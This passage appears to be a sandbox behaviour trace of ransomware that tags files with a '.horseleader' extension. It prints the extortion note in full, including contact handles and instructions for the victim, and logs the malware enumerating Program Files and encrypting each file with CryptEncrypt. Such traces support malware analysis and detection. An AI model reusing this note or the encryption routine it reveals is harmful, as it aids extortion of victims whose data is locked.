dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.623] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.623] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.625] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.625] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.625] CloseHandle (hObject=0x158) returned 1 [0251.625] GetProcessHeap () returned 0x780000 [0251.625] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.625] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e96ab6a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e96ab6a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12ea, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="menu_style_default_Thumbnail.png", cAlternateFileName="")) returned 1 [0251.625] lstrcmpiW (lpString1="menu_style_default_Thumbnail.png", lpString2="Windows") returned -1 [0251.625] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png") returned 80 [0251.625] StrStrIW (lpFirst="menu_style_default_Thumbnail.png", lpSrch=".horseleader") returned 0x0 [0251.625] lstrcmpW (lpString1="menu_style_default_Thumbnail.png", lpString2="#Decrypt#.txt") returned 1 [0251.625] lstrcmpW (lpString1="menu_style_default_Thumbnail.png", lpString2="_uninstalling_.png") returned 1 [0251.625] lstrlenW (lpString=".testttjffg") returned 11 [0251.625] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png", lpSrch=".testttjffg") returned 0x0 [0251.625] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.625] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.625] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\menu_style_default_thumbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.627] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef11f38, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef11f38, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.627] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.627] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png") returned 80 [0251.627] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.627] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.627] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.627] lstrlenW (lpString=".testttjffg") returned 11 [0251.627] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.627] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.627] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.627] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.627] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef11f38, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef11f38, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.627] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.627] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png") returned 86 [0251.627] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.628] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.628] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.628] lstrlenW (lpString=".testttjffg") returned 11 [0251.628] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.628] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.628] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.628] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.628] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef38095, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef38095, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.628] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.628] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png") returned 81 [0251.628] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.628] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.628] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.628] lstrlenW (lpString=".testttjffg") returned 11 [0251.628] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.628] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.628] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.629] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.629] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef5e1f2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef5e1f2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.629] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.629] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png") returned 87 [0251.629] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.629] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.629] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.629] lstrlenW (lpString=".testttjffg") returned 11 [0251.629] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.629] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.629] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.629] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.630] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef8434f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef8434f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.630] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.630] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png") returned 78 [0251.630] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.630] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.630] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.630] lstrlenW (lpString=".testttjffg") returned 11 [0251.631] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.631] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.631] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.631] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.631] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef8434f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef8434f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.631] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.631] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png") returned 84 [0251.631] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.631] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.631] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.631] lstrlenW (lpString=".testttjffg") returned 11 [0251.631] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.631] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.631] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.631] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.631] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f465237, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7ae1d4, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f48b4a6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OldAge", cAlternateFileName="")) returned 1 [0251.632] lstrcmpiW (lpString1="OldAge", lpString2="Windows") returned -1 [0251.632] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge") returned 54 [0251.632] lstrcmpW (lpString1="OldAge", lpString2=".") returned 1 [0251.632] lstrcmpW (lpString1="OldAge", lpString2="..") returned 1 [0251.632] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.632] GetProcessHeap () returned 0x780000 [0251.632] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.632] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\*") returned 56 [0251.632] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f465237, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7ae1d4, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f48b4a6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.634] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.634] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\.") returned 56 [0251.634] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.634] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f465237, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7ae1d4, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f48b4a6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.634] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.634] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\..") returned 57 [0251.634] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.634] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.635] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fcc1ca4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fcc1ca4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.635] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.635] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png") returned 72 [0251.635] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.635] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.635] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.635] lstrlenW (lpString=".testttjffg") returned 11 [0251.635] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.635] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.635] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.635] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.635] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fce7e01, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fce7e01, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0251.635] lstrcmpiW (lpString1="15x15dot.png", lpString2="Windows") returned -1 [0251.635] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png") returned 67 [0251.635] StrStrIW (lpFirst="15x15dot.png", lpSrch=".horseleader") returned 0x0 [0251.635] lstrcmpW (lpString1="15x15dot.png", lpString2="#Decrypt#.txt") returned 1 [0251.635] lstrcmpW (lpString1="15x15dot.png", lpString2="_uninstalling_.png") returned 1 [0251.635] lstrlenW (lpString=".testttjffg") returned 11 [0251.636] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png", lpSrch=".testttjffg") returned 0x0 [0251.636] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.636] CryptEncrypt (in: 